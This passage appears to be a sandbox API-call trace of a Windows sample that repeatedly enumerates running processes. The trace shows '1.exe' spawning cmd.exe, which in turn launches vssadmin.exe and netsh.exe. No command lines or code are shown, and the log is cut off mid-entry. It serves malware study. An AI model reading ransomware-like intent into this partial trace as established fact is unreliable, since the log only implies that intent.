hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0054.348] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.349] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.349] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0054.350] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0054.351] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.352] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0054.354] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0054.354] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0054.355] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0054.356] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.357] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.849] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0054.850] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0054.851] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0054.851] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0054.852] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.853] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0054.853] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0054.854] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0054.854] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0054.855] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0054.856] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0054.857] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0054.857] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0054.858] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0054.858] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0054.859] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0054.860] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0054.860] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0054.861] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0054.862] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0054.863] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0054.863] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0054.865] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0054.866] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0054.866] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0054.867] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0054.868] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0054.869] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0054.870] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0054.871] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0054.871] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.872] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.873] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0054.874] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0054.875] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.876] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0054.876] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0054.877] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.878] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.879] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0054.880] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.881] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0054.882] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0054.883] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.883] Process32NextW (in: hSnapshot=0x328, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0055.166] CloseHandle (hObject=0x328) returned 1 [0055.166] Sleep (dwMilliseconds=0x1f4) [0056.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0056.072] Process32FirstW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.072] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.073] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.074] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.075] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.075] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.076] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.077] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.077] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.078] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.079] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0056.079] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0056.080] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.081] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.082] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.082] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.083] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.084] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.084] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.085] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.086] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.086] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.087] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.088] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.088] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.089] Process32NextW (in: hSnapshot=0x324, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, 